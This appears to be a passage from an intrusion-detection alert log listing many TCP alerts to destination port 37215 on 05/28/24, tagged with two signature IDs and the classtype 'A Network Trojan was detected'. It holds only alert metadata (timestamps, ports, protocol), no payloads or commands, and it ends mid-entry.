            Timestamp:05/28/24-09:57:41.326217
            SID:2829579
            Source Port:59068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.527411
            SID:2829579
            Source Port:55812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.614885
            SID:2829579
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883354
            SID:2835222
            Source Port:42880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.884939
            SID:2829579
            Source Port:56872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936242
            SID:2829579
            Source Port:39152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550304
            SID:2835222
            Source Port:38050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967875
            SID:2829579
            Source Port:49872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869476
            SID:2829579
            Source Port:44186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.725038
            SID:2829579
            Source Port:43400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.485600
            SID:2835222
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260385
            SID:2829579
            Source Port:38292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518610
            SID:2835222
            Source Port:51302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.916901
            SID:2829579
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.872613
            SID:2829579
            Source Port:34118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.998437
            SID:2829579
            Source Port:56852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.400158
            SID:2829579
            Source Port:33030
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.473308
            SID:2829579
            Source Port:35796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772437
            SID:2835222
            Source Port:37072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842952
            SID:2835222
            Source Port:44244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836571
            SID:2829579
            Source Port:36654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.905199
            SID:2829579
            Source Port:47848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260526
            SID:2829579
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847699
            SID:2835222
            Source Port:53652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.326655
            SID:2835222
            Source Port:57000
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.348634
            SID:2829579
            Source Port:40208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.873287
            SID:2829579
            Source Port:60526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070053
            SID:2829579
            Source Port:45018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810786
            SID:2829579
            Source Port:54370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061539
            SID:2829579
            Source Port:59410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.941618
            SID:2829579
            Source Port:56454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.651209
            SID:2829579
            Source Port:54824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721833
            SID:2835222
            Source Port:49328
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728823
            SID:2829579
            Source Port:44146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581871
            SID:2835222
            Source Port:59136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698186
            SID:2835222
            Source Port:36982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849521
            SID:2835222
            Source Port:45380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000092
            SID:2829579
            Source Port:60770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996137
            SID:2829579
            Source Port:50484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.807113
            SID:2835222
            Source Port:60128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669938
            SID:2829579
            Source Port:40098
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.703754
            SID:2835222
            Source Port:45190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930898
            SID:2835222
            Source Port:36742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.027738
            SID:2829579
            Source Port:53952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984905
            SID:2829579
            Source Port:60182
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832379
            SID:2835222
            Source Port:57486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291539
            SID:2829579
            Source Port:33286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.850544
            SID:2835222
            Source Port:58308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064310
            SID:2829579
            Source Port:60010
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.922477
            SID:2835222
            Source Port:49006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872567
            SID:2829579
            Source Port:39080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516532
            SID:2829579
            Source Port:44190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.524340
            SID:2829579
            Source Port:50176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.962891
            SID:2835222
            Source Port:49118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.924878
            SID:2829579
            Source Port:35748
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927361
            SID:2829579
            Source Port:51594
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.507251
            SID:2835222
            Source Port:52282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.922344
            SID:2829579
            Source Port:56090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.059794
            SID:2829579
            Source Port:43512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.798600
            SID:2829579
            Source Port:33084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442688
            SID:2829579
            Source Port:56004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.542826
            SID:2835222
            Source Port:53426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.860728
            SID:2835222
            Source Port:52906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.062543
            SID:2835222
            Source Port:37274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861409
            SID:2835222
            Source Port:36548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.900577
            SID:2835222
            Source Port:44202
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012524
            SID:2829579
            Source Port:54298
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834349
            SID:2829579
            Source Port:39978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.075064
            SID:2829579
            Source Port:49684
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735965
            SID:2835222
            Source Port:50300
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967408
            SID:2835222
            Source Port:41484
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065475
            SID:2829579
            Source Port:40968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.451494
            SID:2835222
            Source Port:54292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.598006
            SID:2829579
            Source Port:53710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.883331
            SID:2829579
            Source Port:33836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.047874
            SID:2829579
            Source Port:33914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988065
            SID:2829579
            Source Port:44526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069835
            SID:2835222
            Source Port:60522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.018858
            SID:2835222
            Source Port:51442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.878747
            SID:2835222
            Source Port:48774
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278407
            SID:2835222
            Source Port:36294
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582314
            SID:2829579
            Source Port:53160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.459432
            SID:2829579
            Source Port:49976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.996059
            SID:2835222
            Source Port:57820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930981
            SID:2829579
            Source Port:38392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507323
            SID:2835222
            Source Port:39686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.811934
            SID:2829579
            Source Port:53266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.814287
            SID:2829579
            Source Port:53504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.766257
            SID:2835222
            Source Port:42780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772033
            SID:2829579
            Source Port:37134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951261
            SID:2829579
            Source Port:41584
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.861234
            SID:2835222
            Source Port:39804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.931435
            SID:2835222
            Source Port:34522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855546
            SID:2829579
            Source Port:57946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862054
            SID:2835222
            Source Port:34166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895990
            SID:2835222
            Source Port:54424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.266223
            SID:2829579
            Source Port:43830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.675906
            SID:2829579
            Source Port:44694
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.783523
            SID:2835222
            Source Port:50464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.894124
            SID:2829579
            Source Port:56108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765712
            SID:2835222
            Source Port:39500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.617036
            SID:2835222
            Source Port:56490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005135
            SID:2835222
            Source Port:45370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.310746
            SID:2835222
            Source Port:48250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870286
            SID:2835222
            Source Port:35310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004731
            SID:2835222
            Source Port:32982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.741882
            SID:2829579
            Source Port:47842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817691
            SID:2835222
            Source Port:42736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.076778
            SID:2829579
            Source Port:47446
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808020
            SID:2835222
            Source Port:43522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911301
            SID:2835222
            Source Port:47338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772762
            SID:2829579
            Source Port:57994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.789312
            SID:2829579
            Source Port:57112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999160
            SID:2829579
            Source Port:57988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778756
            SID:2835222
            Source Port:36096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.291277
            SID:2835222
            Source Port:39124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777144
            SID:2829579
            Source Port:59190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.553165
            SID:2835222
            Source Port:32848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871216
            SID:2829579
            Source Port:41724
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990115
            SID:2829579
            Source Port:42048
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.050898
            SID:2829579
            Source Port:46248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843538
            SID:2835222
            Source Port:46680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543983
            SID:2835222
            Source Port:37058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.872314
            SID:2835222
            Source Port:47620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863613
            SID:2829579
            Source Port:52540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716788
            SID:2835222
            Source Port:58736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392732
            SID:2829579
            Source Port:56540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.947473
            SID:2835222
            Source Port:52154
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850166
            SID:2835222
            Source Port:52240
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893746
            SID:2829579
            Source Port:46330
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.014794
            SID:2835222
            Source Port:53008
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.260980
            SID:2829579
            Source Port:57454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862765
            SID:2835222
            Source Port:59314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988694
            SID:2835222
            Source Port:40200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856427
            SID:2829579
            Source Port:55038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.716073
            SID:2829579
            Source Port:37622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901442
            SID:2835222
            Source Port:52980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.944885
            SID:2829579
            Source Port:60342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810404
            SID:2835222
            Source Port:34224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879678
            SID:2835222
            Source Port:57140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.280373
            SID:2835222
            Source Port:51634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.010725
            SID:2835222
            Source Port:59734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.772509
            SID:2835222
            Source Port:37528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777462
            SID:2835222
            Source Port:35276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084569
            SID:2835222
            Source Port:50546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.409183
            SID:2829579
            Source Port:60076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.581764
            SID:2829579
            Source Port:59958
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.937813
            SID:2829579
            Source Port:45626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065500
            SID:2829579
            Source Port:56990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.010484
            SID:2829579
            Source Port:47532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.850496
            SID:2835222
            Source Port:54276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392474
            SID:2835222
            Source Port:58138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.468405
            SID:2835222
            Source Port:34734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.548967
            SID:2829579
            Source Port:40056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808029
            SID:2835222
            Source Port:33954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748430
            SID:2835222
            Source Port:58508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061184
            SID:2835222
            Source Port:39444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804644
            SID:2829579
            Source Port:57082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.930147
            SID:2835222
            Source Port:33006
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:21.065846
            SID:2829579
            Source Port:36508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810867
            SID:2829579
            Source Port:43076
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.917722
            SID:2829579
            Source Port:49282
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.945231
            SID:2835222
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.919757
            SID:2829579
            Source Port:59102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766776
            SID:2835222
            Source Port:52078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412704
            SID:2829579
            Source Port:60444
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954494
            SID:2829579
            Source Port:37996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879419
            SID:2829579
            Source Port:37704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714962
            SID:2835222
            Source Port:57826
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.951398
            SID:2835222
            Source Port:39608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552569
            SID:2829579
            Source Port:60880
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.919107
            SID:2835222
            Source Port:50084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067736
            SID:2835222
            Source Port:37402
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299056
            SID:2829579
            Source Port:57056
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321489
            SID:2829579
            Source Port:33486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825634
            SID:2835222
            Source Port:53758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.333826
            SID:2835222
            Source Port:46834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.072152
            SID:2835222
            Source Port:45342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926975
            SID:2835222
            Source Port:54190
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.654793
            SID:2835222
            Source Port:39362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.552640
            SID:2829579
            Source Port:55952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.913829
            SID:2829579
            Source Port:43478
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979428
            SID:2829579
            Source Port:37710
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804794
            SID:2829579
            Source Port:35890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.847624
            SID:2835222
            Source Port:47224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471312
            SID:2829579
            Source Port:53734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714657
            SID:2829579
            Source Port:42574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735834
            SID:2829579
            Source Port:53198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754618
            SID:2829579
            Source Port:36322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.383972
            SID:2829579
            Source Port:54178
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.728076
            SID:2829579
            Source Port:56026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507145
            SID:2829579
            Source Port:36618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.716731
            SID:2829579
            Source Port:54686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.650806
            SID:2829579
            Source Port:48712
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721432
            SID:2835222
            Source Port:47318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953474
            SID:2829579
            Source Port:56950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343078
            SID:2829579
            Source Port:49412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751718
